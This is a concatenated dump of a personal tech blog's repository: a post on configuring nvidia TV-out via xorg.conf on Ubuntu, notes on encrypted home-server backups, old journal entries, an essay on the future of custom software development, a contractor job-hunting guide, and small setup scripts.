blogger_orig_url: https://timwise.blogspot.com/2007/12/enabling-tv-out-on-ubuntu-linux-710-on.html
---
This weekend, I finally got the tv-out working under linux (Ubuntu 7.10 aka
gusty gibbon) on my laptop. Here's what was involved, including some of the
(time consuming) red herrings involved in getting this set up.
[](http://www.flickr.com/photos/tim_abell/2096850378/)
I've included the full `xorg.conf` files for normal display and tv output at
the end of this post.
I used the composite video output as that's what I have cables for. I haven't
ever tried the s-video output, and I haven't tried the digital audio output
since I divorced microsoft windows and threw her things out into the rain a
couple of years ago.
The quality is pretty poor, but good enough. I think there's a limit of 800x600
for the video out. I'm getting a fair amount of interference on both the video
and audio when the laptop is on mains and connected to my amplifier / tv. I'm
not sure what the cause it but it's not bad enough to be unusable.
I installed the nvidia proprietary (that's a negative word in case you don't
live in my world) drivers some time ago in order to get 3D acceleration, and I
think this is a prerequisite to running the tv-out.
In my intial investigation I came across
[nvoption](http://www.sorgonet.com/linux/nvoption/), which in theory allows you
to turn on the tv-out on the nvidia cards. I did manage to compile and run it
after several hours of trial, error and finding build dependencies but when I
finally got it built and running I found that it would seg fault when I hit the
"apply" button, hurrah! In the process of playing with nvoption however, I
noticed the [nv-online](http://www.sorgonet.com/linux/nv-online/) page that
this person has very generously set up. Reading this it dawned on me that
nvoption purely modifies the /etc/X11/xorg.conf file, and that I don't actually
*need* the tool to get tv-out running. I had originally presumed (the brother
of all ...) that the nvoption tool did some magical proprietary prodding of the
graphics card directly. After a bit of searching to find out where the options
should go (the device section), I was then able to use the [documentation of
options](http://www.sorgonet.com/linux/nv-online/help.html) in the second frame
of the nv-online page to configure my own X. After a bit of experimenting with
different options and lots of restarting of the X server (ctrl+alt+backspace) I
was able to get the desired result of the display mirrored/cloned on both the
lcd and the television.
I tried the nvidia-settings gui tool that comes with the proprietary drivers,
but it was no use for this task. This tool modifies the xorg.conf file. It did
help me recently with a normal dual screen setup (using a crt monitor plugged
into the vga port on the laptop), but it was no help for the tv-out, which was
not even mentioned in the interface.
There is a tool called displayconfig-gtk which is fairly new to Ubuntu that
allows you to save named display profiles for different configurations
(including dual screen, though it didn't quite behave for me). It can be found
under System > Administration > Screens and Graphics. This stores an xorg.conf
file for each profile in /var/lib/displayconfig-gtk/locations/, and an index
file in /var/lib/displayconfig-gtk/locations.conf. This is almost ideal, as I
have created a set of xorg.conf files for my various setups, however it doesn't
seem to cope with applying these custom xorg files. Additionally nvidia seem to
have a weird way of setting the screen to run at its native resolution of
1920x1600, and this tool doesn't cope with it. This was corrected by selecting
the right resolution under System > Preferences > Screen Resolution.
Sadly it looks like there are no tools for easy switching X configuration
files, so the process for now is involves manually copying the config files.
I've created multiple files in /etc/X11, one for each set up including
xorg.conf_lcd and xorg.conf_tv. The switching process is then something along
the lines of "cd /etc/X11/", "sudo cp xorg.conf_tv xorg.conf",
ctrl+alt+backspace (restart x server).
If it's any consolation I recall the process in windows involved starting from
scratch in a distinctly non-intuitive gui and trying to get a whole load of
settings just right, so being able to save the settings is a big step up. I
think it took similar amounts of time to get tv-out running under windoze. I
guess that's the price we pay for allowing companies to deny us access to the
hardware specs so it can be integrated properly. I bought this laptop before I
knew how much control I was giving away, and I endeavour not to make such
mistakes these days.
The "designed for windows xp" sticker has been moved to the equally shiny
microwave oven which brings me a small piece of joy when I make porridge in the
morning.
# xorg.conf for just the laptop screen
```
# nvidia-settings: X configuration file generated by nvidia-settings
# nvidia-settings: version 1.0 (buildmeister@builder3) Mon Apr 16 20:38:05 PDT 2007
Section "ServerLayout"
Identifier "Layout0"
Screen 0 "Screen0" 0 0
InputDevice "Keyboard0" "CoreKeyboard"
InputDevice "Mouse0" "CorePointer"
Inputdevice "Synaptics Touchpad"
EndSection
Section "Files"
RgbPath "/usr/X11R6/lib/X11/rgb"
EndSection
Section "Module"
Load "dbe"
Load "extmod"
Load "type1"
Load "freetype"
Load "glx"
EndSection
Section "ServerFlags"
Option "Xinerama" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/psaux"
Option "Emulate3Buttons" "no"
Option "ZAxisMapping" "4 5"
EndSection
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
Option "SendCoreEvents" "true"
Option "Device" "/dev/psaux"
Option "Protocol" "auto-dev"
Option "HorizScrollDelta" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Keyboard0"
Driver "kbd"
EndSection
Section "Monitor"
# HorizSync source: edid, VertRefresh source: edid
Identifier "Monitor0"
VendorName "Unknown"
ModelName "Sharp"
HorizSync 30.0 - 75.0
VertRefresh 60.0
Option "DPMS"
EndSection
Section "Device"
Identifier "Videocard0"
Driver "nvidia"
VendorName "NVIDIA Corporation"
BoardName "GeForce4 4200 Go"
EndSection
Section "Screen"
Identifier "Screen0"
Device "Videocard0"
Monitor "Monitor0"
DefaultDepth 24
Option "metamodes" "DFP: nvidia-auto-select +0+0"
SubSection "Display"
Depth 24
Modes "1600x1200" "1280x1024" "1024x768" "800x600" "640x480"
EndSubSection
EndSection
```
# xorg.conf for running the tv-out at 800x600, with the laptop displaying the same
```
# nvidia-settings: X configuration file generated by nvidia-settings
# nvidia-settings: version 1.0 (buildmeister@builder3) Mon Apr 16 20:38:05 PDT 2007
Section "ServerLayout"
Identifier "Layout0"
Screen 0 "Screen0" 0 0
InputDevice "Keyboard0" "CoreKeyboard"
InputDevice "Mouse0" "CorePointer"
Inputdevice "Synaptics Touchpad"
EndSection
Section "Files"
RgbPath "/usr/X11R6/lib/X11/rgb"
EndSection
Section "Module"
Load "dbe"
Load "extmod"
Load "type1"
Load "freetype"
Load "glx"
EndSection
Section "ServerFlags"
Option "Xinerama" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/psaux"
Option "Emulate3Buttons" "no"
Option "ZAxisMapping" "4 5"
EndSection
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
Option "SendCoreEvents" "true"
Option "Device" "/dev/psaux"
Option "Protocol" "auto-dev"
Option "HorizScrollDelta" "0"
EndSection
Section "InputDevice"
# generated from default
Identifier "Keyboard0"
Driver "kbd"
EndSection
Section "Monitor"
# HorizSync source: edid, VertRefresh source: edid
Identifier "Monitor0"
VendorName "Unknown"
ModelName "Sharp"
HorizSync 30.0 - 75.0
VertRefresh 60.0
Option "DPMS"
EndSection
Section "Device"
Identifier "Videocard0"
Driver "nvidia"
VendorName "NVIDIA Corporation"
BoardName "GeForce4 4200 Go"
**Option "TwinView" "1"
Option "TwinViewOrientation" "Clone"
Option "MetaModes" "800x600, 800x600;"
Option "TVStandard" "PAL-I"
Option "ConnectedMonitor" "DFP,TV"**
EndSection
Section "Screen"
Identifier "Screen0"
Device "Videocard0"
Monitor "Monitor0"
DefaultDepth 24
#Option "metamodes" "DFP: nvidia-auto-select +0+0"
SubSection "Display"
Depth 24
Modes "1600x1200" "1280x1024" "1024x768" "800x600" "640x480"
EndSubSection
EndSection
```
<file_sep>---
permalink: /represent
redirect_to: https://timabell.github.io/right-to-represent/
---
<file_sep>---
layout: post
title: Home server backups
date: 2017-08-29 20:31:08.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/29/home-server-backups/"
---
The setup
* Ubuntu server domU xen host
* Ubuntu server xen VM with LUKS full disk encryption
* docker-compose
* syncthing with built-in "Staggered File Versioning"
Plan
* Plug in usb external hdd, with full disk encryption (i.e. a LUKS partition taking up almost all the space, plus a little fat32 with a text file in case anyone finds it and wants to return it).
* Use LUKS key chaining to be able to unlock the disk without entering a password
* Use autofs to automatically mount/unmount so that it's safe to unplug when a backup isn't running.
* Use rsync to push all the files from the syncthing data directory onto the usb disk.
Somehow need to make the disk accessible to the VM.
Finding the luks partition when plugged into the host:
```
tim@spot:~$ sudo fdisk -l
...
Disk /dev/sdc: 931.5 GiB, 1000170586112 bytes, 1953458176 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x6380ad37
Device Boot Start End Sectors Size Id Type
/dev/sdc1 63 21579 21517 10.5M c W95 FAT32 (LBA)
**/dev/sdc2 21580 1953147527 1953125948 931.3G 83 Linux**
tim@spot:~$ ll /dev/disk/by-uuid/
...
lrwxrwxrwx 1 root root 10 Aug 29 21:51 **6ca09b72-8c9b-4571-8943-9f1d520671ab -> ../../sdc2**
```
Confirm it's the luks partition:
```
tim@spot:~$ sudo cryptsetup luksDump /dev/disk/by-uuid/6ca09b72-8c9b-4571-8943-9f1d520671ab
LUKS header information for /dev/disk/by-uuid/6ca09b72-8c9b-4571-8943-9f1d520671abVersion: 1
Cipher name: aes
Cipher mode: xts-plain64
Hash spec: sha1
...
```
I'll update this post with any details as I progress. Don't hold your breath though!
<file_sep>---
layout: post
title: mini police eye in the sky
date: '2009-04-11T16:26:00.001Z'
author: <NAME>
tags:
- ideas
modified_time: '2009-04-11T16:26:32.840Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8997739866191843988
blogger_orig_url: https://timwise.blogspot.com/2009/04/mini-police-eye-in-sky.html
---
Just a quick note on an idea that's been bothering me.
How about a mini semi autonomous police surveillance helicopter?
Would cheaper than a real helicopter, but still offers many of the advantages of having an eye in the sky that can go direct to the scene without contending with traffic etc.
Something like a electric model helicopter with 2+ blades for stability, with a petrol generator for longer run times.
Electronics and gyros to make it naturally stable, and a gps & altimeter for auto navigation.
Carrying a payload of normal and infrared cameras for information gathering.
Transmitting a live video feed over long range radio, and offering long distance control, so it could be controlled centrally by an operator.
I reckon these could be produced for a few thousand pounds each and provide excellent assistance to the force.
<file_sep>---
title: "The Wall"
date: 2004-06-12
slashdot_url: https://slashdot.org/journal/74212/the-wall
---
<p>Mountain biking exploits<br><a href="http://www.t.abell.dsl.pipex.com/photos/wales_20040610/">here</a></p>
<file_sep>---
title: "marketing? grrrrrrr! oh, and greenbelt this weekend"
date: 2005-08-22
slashdot_url: https://slashdot.org/journal/115092/marketing-grrrrrrr-oh-and-greenbelt-this-weekend
---
<p>My mobile just rang.<br>No signal as usual so couldn't hear anything.<br>Looked up the <a href="http://www2.bt.com/localarea">area code</a>, was for Swansea. Ah, thinks me. might be tom. Tried to phone back, piece of crap phone promptly crashed. Turn it on again, swear at the "Vodafone - How are you" greeting (How am I? Pissed off cos the phone crashed, duh. That's the only time I ever see that message). Tried again, only to find it's not tom<nobr> </nobr>:( but some marketing company. Ugh. Cue registration on the <a href="http://www.tpsonline.org.uk/tps/">Telephone Preference Service</a>, and a pissy journal entry.<nobr> </nobr>:)</p>
<p>In other news, plan is to do a day trip to <a href="http://www.greenbelt.org.uk/">greenbelt</a> on the saturday. All welcome.</p>
<file_sep>---
layout: post
title: Why SDV could be a billion dollar business
date: 2017-11-17 23:10:48.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '11558131858'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/11/17/why-sdv-could-be-a-billion-dollar-business/"
---
Okay maybe a billion is a long shot, but I read the Hiten Shah article on [how Trello could have been a $1B business](https://producthabits.com/why-trello-failed-to-build-a-1-billion-business/) (via [startup chat](https://thestartupchat.com/ep258/)) and was surprised to discover there are lessons for how I can turn [Sql Data Viewer](https://sqldataviewer.com/) into a sustainable business.
What trello and SDV have in common:
* Mass (horizontal) appeal
* Easily copied
* Difficult to sell premium versions of the general purpose product ("stickers" anyone?)
I was going to just sell SDV for £100 and be done with it, but this article showed me a better way.
1. Give the general purpose tool away for free (as Trello does)
2. Collect contact information in exchange for the value provided by the free tool.
3. Use the contact list to have conversations with businesses that use it in order to...
4. Find out how integrating tightly with their business could provide real value over and above the general purpose tool.
5. Build vertical-specific integrations, stickyness & marketing.
6. Profit! (No underpants required. Or gnomes.)
What do you think? Drop me a line: [<EMAIL>](mailto:<EMAIL>)
<file_sep>---
title: The death of custom software development
layout: post
---
I've been around this industry for a long time and have been quietly observing the bigger trends while I fiddle around with the details of software.
Here's what I've noticed: writing software by hand is doomed. Expect that it isn't, and it's a bit more nuanced than that.
I think the industrial revolution and the creation and growth of engineering as a profession is a good way to think about the progression of the software profession in the large.
## The long view - the birth of payroll software
A few years ago I decided to get a bit stronger (being your typically feeble software engineer at the time) and joined a Nuffield gym and took them up on their personal training options so that I wouldn't injure myself picking up the first 1kg weight I found in the gym. The PT I got happened to be a lovely older chap named Bryan, who is a very calm and experienced trainer who really helped me build some useful real-world strength through the medium of increasingly heavy kettle-bells and other such devices, all without injury. Now obviously we got talking as we spent many hours on turning me into a proper human, and it turns out that Bryan used to work for the might HP (the computer company not the sauce) of all things, and was part of the software world for many years before I joined it amidst the dot-com mania. I have heard talk of people writing custom payroll systems in the past, but Bryan actually lived it and it was great hearing the stories. In many ways nothing much has changed; software engineers write custom software to solve some pressing business problem for the big businesses that can afford it, and everyone else gets by with bits of paper or whatever they can pull together. The software engineers complain about the hardware engineers, the hardware engineers complain about the software engineers, the sales people sell things that are expensive to do and the software engineers grumble and try and make good. There are fascinating stories of obscure bugs where you have to drill all the way down to the compiler or hardware to find the true source; the stuff of coder legends. All this was true then and is true now.
"That's all very well", you say, but what's that got to do with me? Well I think some of the systems Bryan worked on are illustrative of the geological shifts in software over the years, and are indicative of changes happening to this day and still to come.
In that era, there was no good off-the-shelf payroll software that could solve every business's payroll needs, and every business needs to pay its staff. Doing it by hand is laborious and error prone which makes it a good candidate for turning into software. The in-house custom coding crowd got there first and made it work for big businesses that could afford development teams or the equivalent consultancy fees. Then vendors started to show up but there were edges that they couldn't handle so there was still room for custom code, and now it would be [almost] madness to start a payroll software company (though you might find a way to disrupt the existing players like Sage, but it's not going to be all green fields for the taking like it was back then).
## The trend of commoditization and the shrinking need for custom code
"So what", you say, "there's still vast plains of untouched lands for software development, coding will never die! Coders unite!"
As the really big universal problems are picked off one by one there is indeed still plenty of room, for now at least, for custom code.
(By big universal problems I mean things like: accounting, payroll, Enterprise Resource Planning aka ERP, development tooling, website creation, online payments, social media, buying and selling privately online, car-sharing, short-term property rentals, travel bookings, etc. etc.)
Some organisations will always think they are too special or have too much ego invested in rolling their own (not-invented-here syndrome) to buy an off the shelf options. This is inefficient, but will happen nonetheless if they want to pay for it.
There will always be innovation and disruption, which will require engineering effort. Even in the age-old physical realm of engineering such as building roads, bridges and buildings there continues to be innovation and a need for skilled highway and bridge engineers.
Undeniably, however, there are whole classes of problems that software is capable of solving that have already been solved (some better than others of course), and a market of off the shelf or open source software dominates each particular problem leaving little room for expensive one-off custom builds to solve the same problem again.
As each vendor gets better at solving the problem at hand (or gets disrupted when they fail to), more and more use cases that used to require custom code are served by off-the-shelf software eliminating the need for developer time and replacing it with more-or-less need for installation, setup and configuration expertise.
## The end-game for software development
In the very long run (maybe another 100 years?) I see us getting to a steady state much like exists in traditional physical engineering. There are no vast new uncharted problem spaces waiting to return billions of dollars just for being first to get there. There will still be the occasional disruption but we'll look back on the dot-com boom in the late '90s just like we look back on the industrial revolution and the creation of railroads for the first time. We'll still have railroads, and we'll still have social media platforms and SaaS businesses; and sometimes one company will die and be replaced by others; but we won't be awestruck by silicon valley's ability to turn the world on it's head any more. It will just be normal.
As for the software developers and their trade; they won't go extinct, they'll probably have the same job titles more or less. There will be more developers working for the SaaS companies, infrastructure companies and boxed software companies (locally installed software will never die), and less developers working for businesses that aren't fundamentally software businesses. The latter will just buy the outputs of the software companies for far less than they would have had to pay a development team or outsourcer.
## Developer salaries
Companies that have money will always pay good money for good people, and software businesses serving worldwide business and consumer markets with software that costs nothing to replicate will always have plenty of money.
The "shortage" of software developers caused by the collapse in interest in computer science degrees after the dot-com bust combined with ever increasing production of software has already started to be mitigated as the "boot camp" model that has been running for a few years now at scale is starting to result in volumes of quality and sufficiently experienced engineers. This will push prices for the "average" developer down. In fact prices of the average developer haven't really moved much in the last 20 years in spite of the effects of inflation eating away at the real value of that income. £50-60k is still a reasonable salary for an experienced engineer in an average job in the UK just like it has been for years, while house prices have rocketed up in that time.
So in the long run apart from people that can make themselves invaluable to the richest companies (which takes more than being able to write Python or C#) will still be well rewarded, but the days of exceptional salaries for anyone that can write a `for` loop let alone recursion are well behind us now.
## The fractures and integrations between software
An interesting effect of the ever-growing amount of coverage of off-the-shelf software and SaaS companies in the global problem-space of business is the rising challenges and expectations for making it all work together (often known as "systems integration").
For sectors where there are many similar businesses (think plumbers, accountants, travel agents), the software vendors will produce solutions that cover everything that the profession needs all in one offering (marketing, finance tracking, invoicing, customer contact etc.). They can do this cost-effectively by selling the same thing repeatedly for near-zero marginal cost.
Bigger more complicated businesses, or more unique businesses are left trying to avoid building everything they need from scratch and instead trying to cobble together a complete solution for their business from all the various SaaS and on-site offerings that are out there.
As businesses put solutions in place for each problem they have to solve, they then start looking at how well these things are working together, and mostly discover that they aren't. One SaaS thinks it has the answer to everything but is wrong, another on-site system thinks it owns the data about customers but the cloud-based CRM has got out of sync again and they keep upsetting customers by getting their facts wrong. So sometimes they just paper over the cracks with people based processes and spreadsheets. Sometimes they hire developers to try and glue systems together that really don't want to be glued together (through the magic of dubious quality APIs or maybe direct SQL database access).
Some bits of software provide value as a standalone thing (e.g. document or chat tools), but even with those there's a drive to integrate (e.g. single sign-on to avoid access for previous employees, auditing and storage for compliance etc). Other bits of software are very painful to leave disconnected (e.g. a storefront in Magento where customers purchase goods and an inventory ordering/management (ERP) system in SAP Business One that makes sure there's anything to ship).
To solve this latest self-inflicted pain of the software world a whole new class of software has emerged who's only job is to join systems together that don't know how to connect directly, or to act as an orchestrator of all the flows of data. You might have seen IFTTT (If This Then That) which is the consumer-centric version of this where you can make any number of events in one SaaS trigger actions elsewhere. Another is Business Process Automation (BPA) such as Codeless BPA which connect all sorts of enterprise software together by hook or by crook, while giving a central place to manage the flow of data and massage and monitor it on the way through as needed.
But even *that* extra layer of connection still doesn't always give us the magical point and click connection we were promised decades ago where you can make your whole business work without talking to any nerds. For simpler cases you might get lucky, but as soon as you have to make a web hook work many people just glaze over and reach for the phone. And if something stops working between two bits of software that don't really like each other, and your business's whole income depends on that data flow, you're going to do whatever it takes to make it behave again. So in a slightly different shape we find ourselves yet again in need of a vast army of technical folks who really know what's going on and how to work the magic to make the wheels turn again and the ones and zeros flow like a spring down a mountain-side.
## Service buses and event sourcing
One of my tech friends mentioned this (very technical) approach to solving the pains. This is a really good point, as you can get better more scalable, more fault tolerant and more responsive systems with these approaches. The move to this approach is however contingent on either the vendors playing ball, or on your systems being sufficiently hand-coded already that you can make these kinds of architectural improvements. YMMV as they say. An interesting aside that's worth being aware of and considering. I won't go into what they are here as there's tons of content out there on this.
## AI (Artificial Intelligence) and Machine Learning (ML)
A hot topic of the day is AI and ML. These are growth areas for good reason as they can eliminate whole swathes of formerly labour intensive work, but personally I don't see programming in any meaningful sense as being one of them. I might be a bit biased of course. If anything this is likely to spawn yet more need for highly capably technical folks to build and integrate these new systems, regardless of where the boundaries of each system sits.
## A new consultancy
Yes there was a reason I was even thinking about this, let alone writing it down, but this isn't really a pitch; I genuinely find this stuff interesting to think and write about.
I'm building a new systems integration business off the back of my experience in tech, so if that's relevant to you drop me an email <mailto:<EMAIL>> and let's talk. I'm looking to build my network of people who I/we can help, and also my network of people who might want to be involved in the new business.
## A penny for your thoughts
I'd love to talk to you *on an actual phone call* if you thought this was interesting or relevant (or wrong or silly!)
Drop me a line on <mailto:<EMAIL>> and arrange a call!
## Footnotes
### Many names of non-custom software
Sometimes you may hear software referred to as COTS, which is short for "Commercial Off The Shelf" software, or "boxed software". These days you might call that codeless, no-code or low-code. Or maybe "apps". The point here is that you don't have to pay developers to solve a problem (which is expensive, slow and error prone - good for developers paid for their time and skills, not so good for the business paying the bill).
<file_sep>---
title: "comedy email circular"
date: 2006-05-25
slashdot_url: https://slashdot.org/journal/136226/comedy-email-circular
---
<p>Thanks to our head of sales for this one:</p>
<p>=========================================</p>
<p>The Department of Transport has now devised a new scheme in order to identify poor drivers and give good drivers the opportunity to recognise them whilst driving.</p>
<p>For this reason as from the middle of May 2006 those drivers who are<br>found to be driving badly which includes:</p>
<p>
-overtaking in dangerous places;</p>
<p>
-hovering within one inch of the car in front;</p>
<p>
-stopping sharply;</p>
<p>
-speeding in residential areas;</p>
<p>
-pulling out without indication;</p>
<p>
-performing U turns inappropriately in busy high streets;</p>
<p>
-under taking on motorways and</p>
<p>
-taking up more than one lane in multi lane roads,</p>
<p>
These drivers will be issued with flags, white with a red cross,<br>signifying their inability to drive properly. These flags must be<br>clipped to a door of the car and be visible to all other drivers and<br>pedestrians.</p>
<p>Those drivers who have shown particularly poor driving skills will have<br>to display a flag on each side of the car to indicate their greater lack<br>of skill and general lower intelligence mindset to the general public.</p>
<p>Please circulate this to as many other motorists as you can so that<br>drivers and pedestrians will be aware of the meaning of these flags.</p>
<p>
Department of Transport.</p>
<p><NAME> - Engineer<br>SCC Highway Safety and Improvement<br>Integrated Transport (East)</p>
<file_sep>#!/bin/sh -v
# https://asdf-vm.com/#/core-manage-asdf-vm
git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.7.8
sudo apt-get install libssl-dev libreadline-dev zlib1g-dev
asdf plugin add ruby
asdf install
# show versions in use
asdf current
bundle install
<file_sep>---
title: "Now I'm annoyed"
date: 2004-09-14
slashdot_url: https://slashdot.org/journal/83729/now-im-annoyed
---
<p>Once again I've been threatened by the BBC.<br>Edited image of the <a href="http://www.timwise.co.uk/images/threat_sm_ed.jpg">most recent letter</a> [48Kb]</p>
<p>I've reeled of a letter to white dot to see it they can help, or know of people who are similarly irritated.</p>
<p>See also:<br><a href="http://www.whitedot.org/">http://www.whitedot.org/</a><br><a href="http://www.tvlicensing.co.uk/">http://www.tvlicensing.co.uk/</a> -Resizes your browser! Very bad web design.</p>
<p>Letter follows:<br>===============================================<br>To: info/at/whitedot/dot/org<br>Subject: uk tv licensing</p>
<p>Hello folks.</p>
<p>I watched your telly program yonks ago (the one on the BBC saying, erm, don't watch the BBC!), and had to agree with more or less all your arguments. Bit disappointed you've not updated your site lately (last 12 months), maybe you got distracted by the flickering box in the corner?! I haven't had a TV in my flat for the last nine months now, and guess what. I don't miss it.</p>
<p>I've been getting threatening letters regularly from the BBC's TV Licensing division since about February, but this latest one has a tone which I find highly offensive as it implies that there can be no doubt I am a criminal. I've checked every letter to make sure there is no legal compulsion to tell them I have no TV, and there doesn't seem to be. I looked through the whole of the HTML on <a href="http://www.tvlicensing.co.uk/">http://www.tvlicensing.co.uk/</a> and found no reference to not having a TV.</p>
<p>I was hoping you might know what other people feel about being threatened this way, and what people have done about it.</p>
<p>I'd particularly like to draw your attention to the small print at the bottom of the page which says "If you have recently purchased a license, please accept our apologies...", and the notable absence of any such apology to those of us who dislike television far too much to pay £121 for it.</p>
<p>To be fair, there is actually a reasonable reference to people who do not own a TV on page 12 of this:<br><a href="http://www.tvlicensing.co.uk/pdfs/40115_BBC_Freedom_of_Info.pdf">http://www.tvlicensing.co.uk/pdfs/40115_BBC_Freedom_of_Info.pdf</a><br>though it's taken me half an hour to find it and it doesn't detract from the fact that I've just been threatened with court action (again) and the £1,000 fine that they go on about.</p>
<p>Latest letter attached.</p>
<p>Yours</p>
<p><NAME><br>Berkshire,<br>UK</p>
<file_sep>---
title: "google wos ere"
date: 2005-08-10
slashdot_url: https://slashdot.org/journal/114178/google-wos-ere
---
<p>Google has cached a visit to my header display page, which is cool (if you have a clue what planet I'm on)<br><a href="http://192.168.127.12/search?q=cache:rJkIzyKroCYJ:www.timwise.co.uk/userdetails.asp+site:timwise.co.uk&hl=en">http://192.168.127.12/search?q=cache:rJkIzyKroCYJ:www.timwise.co.uk/userdetails.asp+site:timwise.co.uk&hl=en</a></p>
<file_sep>---
title: "trackback"
date: 2005-10-11
slashdot_url: https://slashdot.org/journal/119447/trackback
---
<p>posted comment here:<br><a href="http://evilsoft.blogspot.com/2005/04/whats-in-box.html#comments">http://evilsoft.blogspot.com/2005/04/whats-in-box.html#comments</a></p>
<file_sep>---
title: "some things I'm happy about"
date: 2005-05-23
slashdot_url: https://slashdot.org/journal/107567/some-things-im-happy-about
---
<p>I cycled to work every day since Wednesday. That's 4 days now<nobr> </nobr>:) and 72 miles. Also have all the right clips for pump etc now.</p>
<p>Really getting stuck into new project at work, which is good.</p>
<p>Really getting stuck into Linux at home (mostly <a href="http://fedora.redhat.com/">fedora</a>). Currently trying to figure out what I've done wrong on my attempt at a samba share.</p>
<p>I'm also making quite a good attempt at keeping <a href="http://www.timwise.co.uk/synch/xbel.xml">my bookmarks</a> up to date, and adding new stuff. (link from <a href="http://www.timwise.co.uk/">timwise</a>)</p>
<p>If you had noticed (unlikely) that my stats pages and are down and that the full size photos are missing it's because the little old laptop I've been running them on got hacked and I haven't fixed it yet. That'll teach me for lapsing on updates! I'll probably post interesting details of what I find when I get around to analysing the machine.</p>
<p>x</p>
<p>Tim</p>
<file_sep>#!/bin/bash
# Usage:
# ./new "Some blob post title"
name="${1:-todo}" # default name
kebab_name=$(sed -e 's/ /-/g' -e 's/\(.*\)/\L\1/g' <<< "$name")
newfile=_posts/`date +"%Y-%m-%d"`-$kebab_name.md
sed "s/name_here/$name/" _drafts/template.md >> "$newfile"
echo "$newfile created"
vim "$newfile"
<file_sep>---
title: How to find contract developer clients
layout: post
categories: [contracting,resources]
---
## Handling recruiters
Before you dive in, you might want to look at my [page on dealing with
recruiters](/recruiters/), especially if you are going to be dealing with
multiple recruiters at once.
## Rate research with ITJobsWatch.co.uk
[IT JobsWatch](https://www.itjobswatch.co.uk/contracts/uk/developer.do) is a great guide to market prices. You can see numbers, graphs, trends, compare tech, and see what appears together.
It's also a useful source of ideas for considering what might be a good investment in saleable skills.
Note the volume as well as the price, for example C# is massively higher volume than Ruby.
## Lead sources
In rough order of the success I've had with them over the 7 years of contracting:
### JobServe
<https://www.jobserve.com/gb/en/Job-Search/>
By far the most reliable source of leads. Slightly shonky website, bit fiddly
to use but it seems that all the recruiters post their wares here.
Tactics:
* Upload a pdf cv
* Run a not particularly tight search (e.g. asp.net as a keyword with 50 mile radius, ordered by distance)
* Blindly send your cv to all of them without worrying too much or bothering to address the post.

This might sound lazy, but in my experience I almost never hear back about the
advertised role, but what this does do is let recruiters that specialize in
your particular skills know you are actively looking, which is a lot easier for
them to make use of than hoping to tempt someone who isn't.
### Workable
<https://jobs.workable.com/>
### LinkedIn
By posting regularly the progress of my search and asking contacts for help I
have had some luck getting referrals. I've never used LinkedIn's proper job
posting system but it's probably worth checking out.
It's worth being careful if you are looking before leaving. I tend to not look
till I've finished the previous contract and had some time to refresh so that
hasn't been an issue for me.
#### LinkedIn job hunt status
You can now set your "open to work" status to everyone, recruiters etc so be
sure to set that. I've definitely had inbound interest from that, albeit
relatively low quality. It also adds an overlay to your profile image which your
network might see when you post things.
#### LinkedIn Hiring groups
* [Outside IR35 contracts board](https://www.linkedin.com/groups/9031918/) group. - I can do invites if you want them. Let me know.
### Recruiters
It's probably worth reaching out to recruiters directly.
They cold email us so no reason not to go the other way when you need a job.
Could work out for everyone.
Here's a useful list that you could use as a source of leads as well as a way
of filtering all the inbound email into a folder
<https://github.com/alexmbird/uk-it-recruiter-domains/blob/master/domains.txt>
### People you know (your "network")
Possibly with the assistance of LinkedIn, WhatsApp, Telegram, Signal, Facebork etc.
I don't like to mention this as the idea of "networking" always made me cringe,
but the truth is who you know matters and can get you an "in" where you might
not have before, and indeed in the past I've won contracts through friends of
friends and repeat business.
It doesn't seem very actionable, and when you need it it's probably too late to
build a "network" of trust, but you can still reach out to the people you do
know with a friendly message and make it clear you're looking (and be clear
about what you're looking for - to trigger what [<NAME> calls "Rolodex
Moments"](https://jonathanstark.com/daily/20170127-dogfooding---rolodex-moments))
This is also a reminder to leave a trail of positive experiences with everyone you meet, go the extra mile, and invest a little regularly in your relationships whether you "need" them in the moment or not.
### Others
These are ones I've come across that you might want to cover if you are looking
to not miss anything, but I haven't either used or succeeded with these myself.
Suggestions for additions to this list welcome, just drop me an email or [raise
a PR](https://github.com/timabell/timwise.co.uk/edit/master/_posts/2019-06-26-how-to-find-contract-dev-jobs.md).
* <https://gun.io/find-work/>
* <https://news.ycombinator.com/submitted?id=whoishiring>
* <https://outsideir35roles.com/contract-listings/>
* <https://remoteok.io/>
* <https://snap.hr/>
* <https://uk.indeed.com>
* <https://wellpaid.io/>
* <https://www.amazon.jobs/>
* <https://www.contractoruk.com/it_contract_jobs>
* <https://www.contractspy.co.uk/>
* <https://www.cv-library.co.uk>
* <https://www.cwjobs.co.uk>
* <https://www.icontract.co.uk/>
* <https://www.itcontractjobs.co.uk>
* <https://www.itjobboard.net>
* <https://www.jobserve.com>
* <https://www.jobsite.co.uk>
* <https://www.linkedin.com/jobs>
* <https://www.monster.co.uk>
* <https://www.reed.co.uk>
* <https://www.technojobs.co.uk>
* <https://www.upwork.com/> - seems to be low paid commodity labour on an
international market largely, however I think some people have managed to
break through this and become in demand. At that point you're basically an
entrepreneur.
* <https://www.quora.com/What-should-I-do-to-increase-my-earnings-on-Upwork-when-I-have-been-registered-on-it-for-over-a-year-and-have-done-only-one-10-job-for-which-I-received-a-five-star-rating>
* <https://www.yunojuno.com/>
#### Deceased sites
* ~~<https://jobs.github.com/>~~ - [github jobs decommissioned](https://github.blog/changelog/2021-04-19-deprecation-notice-github-jobs-site/)
